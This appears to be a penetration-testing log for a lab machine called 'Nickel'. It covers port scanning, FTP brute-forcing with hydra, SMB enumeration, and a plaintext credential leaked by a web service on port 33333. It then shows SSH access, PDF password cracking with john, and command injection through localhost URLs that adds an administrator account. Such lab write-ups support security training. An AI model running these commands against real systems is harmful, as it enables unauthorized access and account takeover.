Nickel
๐งช Pentest Log: {{date:2025-08-04}}
๐ Target Information
- Machine Name: Nickel
- IP Address: 192.168.123.99
- Operating System: Windows
ip=192.168.123.99
๐ก Enumeration
๐ Port Scanning
Command Used
ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt
nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt
Port 21
FileZilla ftpd 0.9.60 beta
Anonymous Login
ftp anonymous@$ip
Bruteforce Common Credentials
hydra -C /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt -6 ftp://$ip
Port 22
Port 80
Port 135
rpcclient -U '' -N $ip
Port 139, 445
smbclient -L \\\\$ip\\
enum4linux -a $ip
Port 3389
Port 8089
Web Content Enumeration
gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt
dirsearch -u http://$ip -r -o dirsearch.txt
Port 33333
curl -i http://$ip:33333/list-running-procs -X POST -H 'Content-Length: 0'
found credential
ariah:NowiseSloopTheory139
๐ฃ Exploitation / Foothold
๐ Vulnerability Summary
- Service / Port: 22
- Vulnerability Type: N/A
๐ Exploit Execution
๐ง Exploit Method
Tool / Script Used:
ssh ariah@$ip
๐งฌ Privilege Escalation
๐ค Current Access
- User: ariah
- Groups: ariah
- Shell Type: ssh
๐ Enumeration
Manual:
cd C:\ftp
dir
found
Infrastructure.pdf
the file requires a password
pdf2john Infrastructure.pdf > hash
john hash --wordlist='/home/kali/Documents/oscp/rockyou.txt'
found the password
Infrastructure.pdf:ariah4168
๐ Privilege Escalation Exploit
๐ Exploit Summary
- Technique Used: Command Injection
- Target Binary/Service: curl
- Reference / Source: N/A
๐ง Exploit Steps
- Smash to root
curl http://localhost/?net%20user%20tony%20tony123!%20%2Fadd
curl http://localhost/?net%20localgroup%20Administrators%20tony%20%2Fadd
curl http://localhost/?net%20localgroup%20%27Remote%20Desktop%20Users%27%20tony%20%2Fadd